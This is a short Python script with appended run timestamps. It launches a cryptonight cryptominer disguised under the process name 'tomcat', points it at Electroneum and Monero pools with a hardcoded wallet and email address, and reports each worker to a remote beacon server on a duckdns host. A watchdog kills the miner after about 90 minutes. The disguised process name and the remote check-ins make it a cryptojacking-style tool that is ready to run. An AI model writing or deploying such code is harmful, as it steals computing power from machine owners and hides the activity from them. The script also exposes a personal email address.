import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:07:05.184660
#2018-02-17 15:53:05.398933
#2018-02-17 17:42:04.012054
#2018-02-17 19:31:05.179744
#2018-02-17 21:20:07.252866
#2018-02-17 23:04:07.724469
#2018-02-18 00:52:01.749355
#2018-02-18 02:40:01.736256
#2018-02-18 04:27:06.659717
#2018-02-18 06:18:05.902512
#2018-02-18 08:07:07.046309
#2018-02-18 09:54:04.699828
#2018-02-18 11:41:07.225107
#2018-02-18 13:26:03.865290
#2018-02-18 15:16:01.224758
#2018-02-18 17:05:05.361402
#2018-02-18 18:52:05.364385
#2018-02-18 20:39:04.571314
#2018-02-18 22:24:05.930083
#2018-02-19 00:14:01.481572
#2018-02-19 02:00:03.936024
#2018-02-19 03:47:01.387283
#2018-02-19 05:31:06.790835
#2018-02-19 07:19:02.114597
#2018-02-19 09:08:03.544811
#2018-02-19 10:57:01.932873
#2018-02-19 12:44:06.741585
#2018-02-19 14:32:09.696946
#2018-02-19 16:19:08.205206
#2018-02-19 18:07:06.869536
#2018-02-19 19:54:06.356120
#2018-02-19 21:41:07.195869
#2018-02-19 23:27:07.551779
#2018-02-20 01:13:05.227300
#2018-02-20 03:03:06.814246
#2018-02-20 04:49:04.983985
#2018-02-20 06:33:01.959682
#2018-02-20 08:19:01.460796
#2018-02-20 10:05:04.322936
#2018-02-20 11:50:04.534984
#2018-02-20 13:38:07.115463
#2018-02-20 15:23:05.807435
#2018-02-20 17:09:07.201375
#2018-02-20 18:59:06.001351
#2018-02-20 20:48:07.389886
#2018-02-20 22:35:05.751295
#2018-02-21 00:16:04.341885
#2018-02-21 02:02:05.625107
#2018-02-21 03:49:02.035551
#2018-02-21 05:32:04.150092
#2018-02-21 07:20:08.703666
#2018-02-21 09:05:09.020212
#2018-02-21 10:54:05.940838
#2018-02-21 12:40:02.470506
#2018-02-21 14:28:01.263577
#2018-02-21 16:16:07.063761
#2018-02-21 18:07:06.219655
#2018-02-21 19:53:06.600419
#2018-02-21 21:40:04.756067
#2018-02-21 23:27:01.626158
#2018-02-22 01:16:01.545599
#2018-02-22 03:04:07.655249
#2018-02-22 04:49:07.403004
#2018-02-22 06:34:05.658734
#2018-02-22 08:21:05.202811
#2018-02-22 10:09:01.395846
#2018-02-22 11:55:01.601810
#2018-02-22 13:39:08.193491
#2018-02-22 15:28:08.563974
#2018-02-22 17:15:06.536056
#2018-02-22 19:03:01.891169
#2018-02-22 20:53:08.163753
#2018-02-22 22:41:04.581960
#2018-02-23 00:27:06.438998
#2018-02-23 02:15:06.245769
#2018-02-23 04:05:05.927634
#2018-02-23 05:51:05.307573
#2018-02-23 07:43:07.403537
#2018-02-23 09:47:09.996014
#2018-02-23 11:48:08.621553
#2018-02-23 13:39:05.339161
#2018-02-23 15:27:07.747880
#2018-02-23 17:17:10.323358
#2018-02-23 19:01:18.259646
#2018-02-23 20:49:04.801041
#2018-02-23 22:34:08.491657
#2018-02-24 00:20:10.194605
#2018-02-24 02:11:05.431886
#2018-02-24 04:02:04.417062
#2018-02-24 05:47:02.013077
#2018-02-24 07:33:06.173762
#2018-02-24 09:20:04.189594
#2018-02-24 11:12:01.372418
#2018-02-24 13:01:03.842574
#2018-02-24 14:48:06.627220
#2018-02-24 16:40:06.747571
#2018-02-24 18:28:02.102061
#2018-02-24 20:14:05.165688
#2018-02-24 22:03:01.256366
#2018-02-25 01:00:10.133307
#2018-02-25 03:56:03.800577
#2018-02-25 06:41:04.388732
#2018-02-25 11:36:08.710658
#2018-02-25 13:38:01.425725
#2018-02-25 15:12:01.785087